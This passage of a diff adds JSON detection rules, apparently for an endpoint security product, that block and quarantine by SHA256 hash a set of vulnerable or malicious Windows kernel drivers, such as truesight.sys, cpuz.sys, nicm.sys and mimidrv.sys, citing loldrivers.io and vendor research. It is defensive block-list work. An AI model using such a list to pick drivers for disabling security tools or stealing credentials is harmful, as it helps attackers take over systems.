"1fb1f7af-1f12-51ac-8efc-b22403b685d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611549Z", + "creation_date": "2026-03-23T11:45:29.611551Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611556Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "057e45b47fe0ca96fe3741058bc4365c9a866dff925cab8cfea4c161b990e8e2", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1fbb35de-b1d9-5710-b636-a2555fc7aab4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473095Z", + "creation_date": "2026-03-23T11:45:30.473099Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473109Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": 
null, + "references": [], + "type": "hash", + "value": "c673f2eed5d0eed307a67119d20a91c8818a53a3cb616e2984876b07e5c62547", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1fc38b99-e554-5127-9ac1-60f8a9abaa7f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977799Z", + "creation_date": "2026-03-23T11:45:29.977801Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977807Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8111085022bda87e5f6aa4c195e743cc6dd6a3a6d41add475d267dc6b105a69f", + "comment": "Vulnerable Kernel Driver (aka NetProxyDriver.sys) [https://www.loldrivers.io/drivers/c1ece07b-e92a-4050-95ee-90e03aa82120/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1fc49f6c-4ee6-5663-8fbb-d14f3a4229b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826420Z", + "creation_date": "2026-03-23T11:45:31.826422Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826427Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8ec94129adcf736bbc7d4a8d9689bba64b9bba8849f420f17ab9292fa671294e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1fd251fa-be87-57c4-b465-43222e0c452b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605788Z", + "creation_date": "2026-03-23T11:45:29.605790Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605795Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "41cceace9751dce2b6ecaedc9a2d374fbb6458cf93b00a1dcd634ad0bc54ef89", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) 
[https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1fd3834b-1203-5941-9dfb-928b7d258115", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455389Z", + "creation_date": "2026-03-23T11:45:30.455392Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455401Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c2557b448d71c6873bf71f5ab41cc618d12d5c91717bf8738b6b5dce187326c2", + "comment": "Vulnerable Kernel Driver (aka VBoxUSB.Sys) [https://www.loldrivers.io/drivers/70fa8606-c147-4c40-8b7a-980290075327/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1fd3fe23-73f3-5c78-94f6-d25c5bdec271", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141078Z", + "creation_date": "2026-03-23T11:45:31.141080Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141085Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "98c2f4a08e0d4b3f25c49ab8efa7e2875dcf084ad6592d4930e19276cf9cab48", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1fd9fa73-7aff-5f30-bedb-59c7629e175d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487023Z", + "creation_date": "2026-03-23T11:45:31.487027Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487035Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "20b164228a019d203a24c761715c3b13e38b16ac01c668727cb716759162950b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1fed9dd1-8f0e-5297-b6ec-70932b5996fb", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830997Z", + "creation_date": "2026-03-23T11:45:30.831001Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831007Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1fc6af1d7f8607539ca11cf35b0be782bf1a758f32960444045da53079a2cdce", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1fee6ff8-f9dd-5f6d-bfdd-bc3669e2c8c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831308Z", + "creation_date": "2026-03-23T11:45:30.831310Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.831323Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "259f27e01cd7cbd9e62beb9387d78f1dba7d3f80da50d9156574a89ae9f6d1e8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1ff5c28a-683d-59ab-b69a-7b20b45d154d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817884Z", + "creation_date": "2026-03-23T11:45:31.817888Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817898Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ac44f0d31b51f6e41d6519772d65a2e82c11f2397f999aac78b1eb16ec369bdc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1ffcf12b-4af7-5153-ad94-e3bd5909452d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470221Z", + "creation_date": "2026-03-23T11:45:30.470224Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470234Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7fe1958f35b91da7819002c38642bb9408db3167bd311c637aaae6f9d45af3e4", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20075074-cd43-53c9-a00d-4f63474fc810", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983068Z", + "creation_date": "2026-03-23T11:45:29.983070Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983076Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"bf118e97d662139c1152d25a69cfa02659381aeeeea9d2222ac96fe740752c09", + "comment": "Vulnerable Kernel Driver (aka nstrwsk.sys) [https://www.loldrivers.io/drivers/e9b099f6-8a12-46f0-a540-40e88cf0ce17/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2009bbe1-e357-570b-be99-cae8ce3b61b0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453461Z", + "creation_date": "2026-03-23T11:45:30.453464Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453473Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bae01ea7b49bd090e198448c41293830a6e2c68821d65f69ec7dc98a16baef21", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20103ec1-1f06-5d36-b33a-4031b58b9b3a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:31.471776Z", + "creation_date": "2026-03-23T11:45:31.471779Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.471788Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a68b800d2ff84f593e6c74bfa38efa7add3d8ef5143f72fdfe5edd3ebbe6757c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20117979-2abb-5a33-b354-a5773b3e5161", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453665Z", + "creation_date": "2026-03-23T11:45:30.453669Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453678Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8fca5b647af3f792898efc1bdc008745643b417282cdee13d4edf93a4a8308a0", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20175d13-d747-553a-aba6-ab62c55ed8bd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817286Z", + "creation_date": "2026-03-23T11:45:31.817288Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817293Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a71e7ecde0a642339d61eebea2adecb3ccdcab0249b739831556e6e95661c7ce", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "201aa671-0ada-52a8-a1ef-ebebfac173ac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497671Z", + "creation_date": "2026-03-23T11:45:31.497673Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497679Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8b36758b96ce1afd3328aec3f4e5808cc2b47d80894032ffa7de14c4767f1f39", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "201b1d5b-01b2-51e9-9798-12be5c18f4bd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475571Z", + "creation_date": "2026-03-23T11:45:31.475574Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475583Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "acca6bbdabb64fdba72f37038a2d342859e56f55f493bbce5097ccd7093d9312", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "201daf13-5e98-58ba-875f-4a59394ebb27", + "test_maturity_current_count": 0, + "test_maturity_delay": 
7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822854Z", + "creation_date": "2026-03-23T11:45:30.822856Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822861Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e24c45ce2672ee403db34077c88e8b7d7797d113c6fd161906dce3784da627d", + "comment": "Vulnerable Kernel Driver (aka SBIOSIO64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2033770c-1838-5069-a2bf-159d9044391d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817382Z", + "creation_date": "2026-03-23T11:45:30.817384Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817389Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ffd548833a96c2c5f8410b22fc110d10b36a47eb0b16b3d2e7edb82c3cabf97b", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20364d36-bfec-587d-ba39-2952d2eda0e5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985430Z", + "creation_date": "2026-03-23T11:45:29.985432Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985438Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "04cfb452e1ac73fb2f3b8a80d9f27e19a344a6bf0f74c7f9cae3ae82d3770195", + "comment": "Dangerous Physmem Kernel Driver (aka Se64a.Sys) [https://www.loldrivers.io/drivers/d819bee2-3bff-481f-a301-acc3d1f5fe58/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "204bc6a4-1e59-5593-8126-1f496a4edc33", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826514Z", + "creation_date": "2026-03-23T11:45:30.826516Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826522Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "95542b32e0881e08e87fd38310f598cacfb37f7fc57b8d7d919a6707b175dbd2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "204bec7c-e9d7-571d-aeaa-be990f5d6941", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159868Z", + "creation_date": "2026-03-23T11:45:31.159884Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159889Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "64c27a36524d1967e9ba2515976823e4471583225676b61ee8b3c87cfa4138e5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20521ede-ccba-5518-8d92-76a7e12e8a09", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156980Z", + "creation_date": "2026-03-23T11:45:31.156982Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156987Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 